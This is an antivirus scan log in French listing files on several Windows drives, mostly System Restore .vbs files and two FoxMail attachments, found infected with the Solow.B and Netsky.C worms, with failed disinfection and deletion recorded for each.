                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                                        Supprimé

                                        C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                                        Supprimé

                                        D:\pagefile.sys.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\pagefile.sys.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\pagefile.sys.vbs=>(unicode)
                                        Supprimé

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                                        Infecté par: Win32.Netsky.C@mm.Damaged

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                                        Echec de la désinfection

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                                        Supprimé

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
                                        Echec de la mise à jour

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                                        Infecté par: Win32.Netsky.C@mm.Damaged

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                                        Echec de la désinfection

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                                        Supprimé

                                        D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
                                        Echec de la mise à jour

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                                        Supprimé

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                                        Echec de la désinfection

                                        D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                                        Supprimé

                                        F:\pagefile.sys.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\pagefile.sys.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\pagefile.sys.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                                        Supprimé

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                                        Echec de la désinfection

                                        F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                                        Supprimé

                                        H:\pagefile.sys.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\pagefile.sys.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\pagefile.sys.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

